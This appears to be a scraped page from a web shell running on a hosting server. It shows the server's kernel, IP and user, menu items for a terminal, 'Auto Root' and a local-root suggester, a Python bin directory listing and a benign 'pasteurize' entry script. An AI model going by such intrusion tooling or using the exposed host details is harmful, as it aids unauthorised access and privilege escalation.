Linux ih01.iridiumhosting.com 5.14.0-611.5.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 08:09:09 EST 2025 x86_64
LiteSpeed
Server IP : 67.227.241.211 & Your IP : 216.73.216.226
Domains :
Cant Read [ /etc/named.conf ]
User : dustinhy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
python37 /
bin /
Delete
Unzip
Name
Size
Permission
Date
Action
chardetect
977
B
-rwxr-xr-x
2023-11-14 12:10
futurize
973
B
-rwxr-xr-x
2023-11-14 12:39
jsonschema
986
B
-rwxr-xr-x
2023-11-14 13:10
pasteurize
977
B
-rwxr-xr-x
2023-11-14 12:39
pydoc3
91
B
-rwxr-xr-x
2024-04-17 17:55
pydoc3.7
91
B
-rwxr-xr-x
2024-04-17 17:55
python3
15.09
KB
-rwxr-xr-x
2024-04-17 17:55
python3.7
15.09
KB
-rwxr-xr-x
2024-04-17 17:55
python3.7m
15.09
KB
-rwxr-xr-x
2024-04-17 17:55
pyvenv
448
B
-rwxr-xr-x
2024-04-17 17:55
pyvenv-3.7
448
B
-rwxr-xr-x
2024-04-17 17:55
raven
961
B
-rwxr-xr-x
2023-11-14 14:27
Save
Rename
#!/opt/alt/python37/bin/python3 # EASY-INSTALL-ENTRY-SCRIPT: 'future==0.17.0','console_scripts','pasteurize' import re import sys # for compatibility with easy_install; see #2198 __requires__ = 'future==0.17.0' try: from importlib.metadata import distribution except ImportError: try: from importlib_metadata import distribution except ImportError: from pkg_resources import load_entry_point def importlib_load_entry_point(spec, group, name): dist_name, _, _ = spec.partition('==') matches = ( entry_point for entry_point in distribution(dist_name).entry_points if entry_point.group == group and entry_point.name == name ) return next(matches).load() globals().setdefault('load_entry_point', importlib_load_entry_point) if __name__ == '__main__': sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) sys.exit(load_entry_point('future==0.17.0', 'console_scripts', 'pasteurize')())